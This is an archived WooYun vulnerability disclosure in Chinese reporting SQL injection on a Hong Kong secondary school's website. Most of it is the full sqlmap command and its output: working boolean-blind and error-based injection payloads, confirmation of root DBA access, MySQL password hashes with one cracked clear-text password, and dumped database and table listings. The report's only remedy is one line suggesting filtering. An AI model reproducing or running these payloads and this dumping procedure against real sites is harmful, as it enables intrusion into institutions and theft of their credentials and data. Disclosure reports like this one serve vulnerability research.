乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-25: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经确认,细节仅向厂商公开 2015-11-07: 细节向核心白帽子及相关领域专家公开 2015-11-17: 细节向普通白帽子公开 2015-11-27: 细节向实习白帽子公开 2015-12-12: 细节向公众公开
香港啟思中學某處存在SQL插入攻擊(DBA權限/root弱密碼泄露/133個表)
測試地址:http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96
python sqlmap.py -u "http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96" -p id --technique=BE --random-agent --batch --current-user --is-dba --users --passwords
---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96---web server operating system: Linux CentOS 6.5web application technology: PHP 5.4.16, Apache 2.2.15back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truesqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96---web server operating system: Linux CentOS 6.5web application technology: PHP 5.4.16, Apache 2.2.15back-end DBMS: MySQL 5.0database management system users [5]:[*] ''@'localhost'[*] ''@'**.**.**.**'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'root'@'**.**.**.**'database management system users password hashes:[*] root [2]: password hash: *EB87920C7207E533743E4C5D8C6AF2CC61C71B35 clear-text password: maintain password hash: NULLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96---web server operating system: Linux CentOS 6.5web application technology: PHP 5.4.16, Apache 2.2.15back-end DBMS: MySQL 5.0available databases [4]:[*] information_schema[*] mysql[*] schoolweb[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96---web server operating system: Linux CentOS 6.5web application technology: PHP 5.4.16, Apache 2.2.15back-end DBMS: MySQL 5.0Database: schoolweb[133 tables]+-------------------------------+| x3sug_ak_acl || x3sug_ak_profiles || x3sug_ak_stats || x3sug_ak_storage || x3sug_assets || x3sug_associations || x3sug_banner || x3sug_banner_clients || x3sug_banner_tracks || x3sug_bannerclient || x3sug_banners || x3sug_bannertrack || x3sug_categories || x3sug_contact_details || x3sug_content || x3sug_content_frontpage || x3sug_content_rating || x3sug_content_types || x3sug_contentitem_tag_map || x3sug_core_log_searches || x3sug_datasafe_pro || x3sug_eweather_cache || x3sug_eweather_locations || x3sug_eweather_prefs || x3sug_eweather_profiles || x3sug_export_categories || x3sug_export_content || x3sug_export_sections || x3sug_extensions || x3sug_fabanner || x3sug_fabannerin || x3sug_fabannerlang || x3sug_fabannerlocation || x3sug_faclient || x3sug_falink || x3sug_falocation || x3sug_fasize || x3sug_finder_filters || x3sug_finder_links || x3sug_finder_links_terms0 || x3sug_finder_links_terms1 || x3sug_finder_links_terms2 || x3sug_finder_links_terms3 || x3sug_finder_links_terms4 || x3sug_finder_links_terms5 || x3sug_finder_links_terms6 || x3sug_finder_links_terms7 || x3sug_finder_links_terms8 || x3sug_finder_links_terms9 || x3sug_finder_links_termsa || x3sug_finder_links_termsb || x3sug_finder_links_termsc || x3sug_finder_links_termsd || x3sug_finder_links_termse || x3sug_finder_links_termsf || x3sug_finder_taxonomy || x3sug_finder_taxonomy_map || x3sug_finder_terms || x3sug_finder_terms_common || x3sug_finder_tokens || x3sug_finder_tokens_aggregate || x3sug_finder_types || x3sug_flexbanners || x3sug_flexbannersclient || x3sug_flexbannersin || x3sug_flexbannerslink || x3sug_flexbannerslocations || x3sug_flexbannerssize || x3sug_gcalendar || x3sug_jce_extensions || x3sug_jce_groups || x3sug_jce_plugins || x3sug_jev_users || x3sug_jevents_categories || x3sug_jevents_exception || x3sug_jevents_icsfile || x3sug_jevents_repbyday || x3sug_jevents_repetition || x3sug_jevents_rrule || x3sug_jevents_vevdetail || x3sug_jevents_vevent || x3sug_k2_attachments || x3sug_k2_categories || x3sug_k2_comments || x3sug_k2_extra_fields || x3sug_k2_extra_fields_groups || x3sug_k2_items || x3sug_k2_rating || x3sug_k2_tags || x3sug_k2_tags_xref || x3sug_k2_user_groups || x3sug_k2_users || x3sug_languages || x3sug_menu || x3sug_menu_types || x3sug_messages || x3sug_messages_cfg || x3sug_migration_configuration || x3sug_modules || x3sug_modules_menu || x3sug_newsfeeds || x3sug_overrider || x3sug_postinstall_messages || x3sug_redirect_links || x3sug_rsbanners_ad || x3sug_rsbanners_adcat || x3sug_schemas || x3sug_sections || x3sug_sembookings || x3sug_seminar || x3sug_semnumber || x3sug_session || x3sug_stats_agents || x3sug_swmenu_config || x3sug_swmenu_extended || x3sug_swmenufree_styles || x3sug_tags || x3sug_template_styles || x3sug_ucm_base || x3sug_ucm_content || x3sug_ucm_history || x3sug_update_sites || x3sug_update_sites_extensions || x3sug_updates || x3sug_user_keys || x3sug_user_notes || x3sug_user_profiles || x3sug_user_usergroup_map || x3sug_usergroups || x3sug_users || x3sug_viewlevels || x3sug_weblinks || x3sug_wf_profiles |+-------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96---web server operating system: Linux CentOS 6.5web application technology: PHP 5.4.16, Apache 2.2.15back-end DBMS: MySQL 5.0Database: schoolwebTable: x3sug_user_keys[7 columns]+----------+------------------+| Column | Type |+----------+------------------+| time | varchar(200) || id | int(10) unsigned || invalid | tinyint(4) || series | varchar(255) || token | varchar(255) || uastring | varchar(255) || user_id | varchar(255) |+----------+------------------+
增加過濾。
危害等级:高
漏洞Rank:12
确认时间:2015-10-28 11:47
已將事件通知有關機構
暂无